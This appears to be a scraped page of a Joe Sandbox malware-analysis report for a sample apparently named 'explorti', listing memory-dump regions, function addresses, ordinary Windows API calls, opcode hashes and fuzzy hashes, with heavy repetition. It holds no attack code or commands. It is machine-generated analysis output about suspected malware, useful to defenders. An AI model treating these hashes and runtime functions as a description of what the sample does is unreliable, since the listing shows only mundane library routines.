Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: HlurNa==$HlurOK==$HlusMa==
API String ID: 1721193555-2203186029
Opcode ID: 447c78daef4bddb0a9b55a38f6cace21832aa4f02c1069c9b5062ca31decaa58
Instruction ID: 0a1c21314370887a7cee10217f7a0eec1f42d1b59e627abf4b66d4de6ef6deb7
Opcode Fuzzy Hash: 447c78daef4bddb0a9b55a38f6cace21832aa4f02c1069c9b5062ca31decaa58
Instruction Fuzzy Hash: 27D10870E00614ABDF24BB68CC5B3AEB772AB52724F544298F4156B3D2DB354E90CBD2

Function 00166E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00166E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00166E7D
__dosmaperr.LIBCMT ref: 00166F12

Part of subcall function 00167177: __dosmaperr.LIBCMT ref: 001671AC

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 7d7b0c2846deec017a504b5544bf43a042fa11439657dcdea7d67c823c12e194
Instruction ID: 93cc2697cf82222844ad913982e2234b407ab0aacfdbf160deea4ba7757d422e
Opcode Fuzzy Hash: 7d7b0c2846deec017a504b5544bf43a042fa11439657dcdea7d67c823c12e194
Instruction Fuzzy Hash: 51417C75900348ABCB24EFB5EC659AFBBF9EF99300B10446DF456D3611EB31A924CB60

Function 00166C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a7dbd89b146620681100ff38aa2fb11a5fcf4c10ca1c44d9525132038f5c48e
Instruction ID: 69d5a90a6ee0d1c00123ea5d72e66cdbfcafe3d4da96f5f34108295248dccd71
Opcode Fuzzy Hash: 0a7dbd89b146620681100ff38aa2fb11a5fcf4c10ca1c44d9525132038f5c48e
Instruction Fuzzy Hash: 48213732A052087BEB117BB49C46BAF37299F42378F214310F9643B1D1DB705E2196A1

Function 001382B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00138454

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 8b248aff88173c71be7f757051aba4d6ef8569ca6f67bcc22c43a67a1b32911a
Instruction ID: de858683e14023031e78db92e6b2c54f928a2e3232c81fa02032625437efae48
Opcode Fuzzy Hash: 8b248aff88173c71be7f757051aba4d6ef8569ca6f67bcc22c43a67a1b32911a
Instruction Fuzzy Hash: 275126709003089BEB24EB68CD497EDB775AB46310F504298F814A77D1EF349A808BA1

Function 00166F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00166FB3

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: bf6a69ddac25c2cc4c2b70d4bf1dbc514acc69014b0ff5071775c27d3454f251
Instruction ID: 847c9577e8d37406fab6f775a996b1f9a597fc8f252bdbda831d655060f4aeea
Opcode Fuzzy Hash: bf6a69ddac25c2cc4c2b70d4bf1dbc514acc69014b0ff5071775c27d3454f251
Instruction Fuzzy Hash: 0111EF7290020CAACB10DE95DD94EDFB7FCAB08710F5052A6E511E6181E731EB58CB61

Function 0016AF0B Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,6065029A,?,?,0014D32C,6065029A,?,001478FB,?,?,?,?,?,?,00137435,?), ref: 0016AF3E

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0cc2fe872b0f11727a5b0b8565a1c5ea0479ff57f075b6acd369a7f719fbed07
Instruction ID: b2b0677a1655b9446fc5c99bf66d5b10bdf34b25e235411afe7845a9285bbd3b
Opcode Fuzzy Hash: 0cc2fe872b0f11727a5b0b8565a1c5ea0479ff57f075b6acd369a7f719fbed07
Instruction Fuzzy Hash: A8E0E57120721156DA2023655D0176E368CCF513B1F8601D1AC14B6081CF61CC2049E3

Function 00146AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00146B65

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b0d386ed8d3211a0da173b0d37ffa31b9e3da3079074599b6b0f9dc8a843c90e
Instruction ID: 070815c28eefbc982b69b7df64ea89ba96b83e0492edfe16047eb6623eb99b3a
Opcode Fuzzy Hash: b0d386ed8d3211a0da173b0d37ffa31b9e3da3079074599b6b0f9dc8a843c90e
Instruction Fuzzy Hash: 99F0A471E00614BBC710BBA89D07B1DBB75EB17B60F900758F821676E1DB345A1487D3

Function 051E020D Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4464735630.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_51e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b012609bfb937571c59c0d6b99cc3c80e85d18d3b12c37b581f17acdf1da4621
Instruction ID: 9a9d4f31706a3f9f23fd1b8305332a1b24f96551b5c633e14145bf966aaf2828
Opcode Fuzzy Hash: b012609bfb937571c59c0d6b99cc3c80e85d18d3b12c37b581f17acdf1da4621
Instruction Fuzzy Hash: CE2126AB54CA416EE70AD6502A5C9F67FBEE9CB730331846BF002CA002E3D18A0A6531

Function 051E01E0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4464735630.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_51e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ac704e537a4975eb33d4856cb5409a2063cd31631532baa28b8159d11b1773
Instruction ID: e51e5e77a4b55a63f3a328e1b0b2997c74202d9f500f297b854fd722f707e2e2
Opcode Fuzzy Hash: 79ac704e537a4975eb33d4856cb5409a2063cd31631532baa28b8159d11b1773
Instruction Fuzzy Hash: 3E21D8E714DA416EE316C2807A5C5B27BBEE9CB7303358497F442CA002E3D55E096631

Function 051E0245 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4464735630.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_51e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e1225f0bd54b85ff0a587d56a890274d10fd874f852ef3ae06dfc155183efd
Instruction ID: 093f46be5d1e5b7a4bc53362c4d6a8d1f87f0e22fd139208dd717b58c99086bd
Opcode Fuzzy Hash: 34e1225f0bd54b85ff0a587d56a890274d10fd874f852ef3ae06dfc155183efd
Instruction Fuzzy Hash: B611C2DB59D5126DB206C5916A5CAF67BAEE5C7730331842BF002C9406F2D59E0A6131

Function 051E01D8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4464735630.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_51e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf50393b19e251355d8364e0ab2cc9c8500b52d9165351ad9990ea8ca983594a
Instruction ID: cc6b5a003620c0ea1a313ed308e5bd9e99dae6252bb12ad7fbbf963d4beba49c
Opcode Fuzzy Hash: bf50393b19e251355d8364e0ab2cc9c8500b52d9165351ad9990ea8ca983594a
Instruction Fuzzy Hash: 50014BEB18C612BD711AC2813B1CABAA7AEE4DB730332842BF443C6502E7D45E496131

Function 051E0270 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4464735630.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_51e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a8f3270743d1f02ae908464936af2b1e373005ca6845d59e65cbbbe0f5d955
Instruction ID: 71b890dd2864f0518e89b6cb8a3da46f24f38f31d87aa3dac0a5615b9af97a48
Opcode Fuzzy Hash: 20a8f3270743d1f02ae908464936af2b1e373005ca6845d59e65cbbbe0f5d955
Instruction Fuzzy Hash: CFF082DB18C2103CB10781913B0D9F6AB6EE8D3631339847BF403D5942E2C5060D6131

Function 051E025F Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4464735630.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_51e0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 860aff3435b0b38e7e28ba65163c823aad4eeed9dbbf93c21920e6cb6b315ef6
Instruction ID: a5d8727e565b9414e2e8e6e961ec22bbebdb5413360f63e7d8c5b3d624e4890f
Opcode Fuzzy Hash: 860aff3435b0b38e7e28ba65163c823aad4eeed9dbbf93c21920e6cb6b315ef6
Instruction Fuzzy Hash: C9F039EB1982113CB10B82813B599F6ABAEE4D763233584BBF803D5443F6C95B0EB131

Non-executed Functions

Function 00173068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001731E3

Strings

1#SNAN, xrefs: 0017437A
1#QNAN, xrefs: 00174381
1#IND, xrefs: 00174373
1#INF, xrefs: 0017439E

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 7a4107e57ef88e274dbdeff2be6efbe7f74b5315365efae38d157eff370e857b
Instruction ID: e41a825265cd53590f477cea48095c92203cca45980e3c10a4e6afe2ccec4343
Opcode Fuzzy Hash: 7a4107e57ef88e274dbdeff2be6efbe7f74b5315365efae38d157eff370e857b
Instruction Fuzzy Hash: 95C23B71E086288FDB29CE28DD447EAB3B5EB48304F1581EAD85DE7240E775AF819F41

Function 00172BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 5cce75e7c3de517f3d676de78922488084e96843c1aac171a1aa5b0a6fc95784
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 39F12F71E012199FDF14CFA8C8906AEB7B1FF49314F258269E919AB345D731AE42CB90

Function 0014CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0014CE82,?,?,?,?,0014CEB7,?,?,?,?,?,?,0014C42D,?,00000001), ref: 0014CB33

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 866a6a40a73a580ab4c0640adc26ac528b352ae84116034ea0535063b38f5e31
Instruction ID: ab76a4fe662a68326c39a5d61613394739093a9f62a3f7f39552c2f4ee9c42d2
Opcode Fuzzy Hash: 866a6a40a73a580ab4c0640adc26ac528b352ae84116034ea0535063b38f5e31
Instruction Fuzzy Hash: FDD0123264353C97CA562B94AC098ADBB1ADF09B903450116ED0567530CB615DD19BD5

Function 00167D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00167EFF

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: d69123d74f4bf020870fcc0915818ffc3c4ba061756a77d47ec0c4522641c05b
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 8351777120C6089BDB3C8A7C8C95BBE679A9F2230CF140999E442D76C2DB13DDB88352

Function 00134CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e624216ea3d6666631cfc8d09f7b6e5876b7831221dbf7263b2f0fb6d2e3341
Instruction ID: 7efeb3038f4b3ccefaa96f45a5ec6618de86ff05afd74a751e9d1a5b280bf9e1
Opcode Fuzzy Hash: 1e624216ea3d6666631cfc8d09f7b6e5876b7831221dbf7263b2f0fb6d2e3341
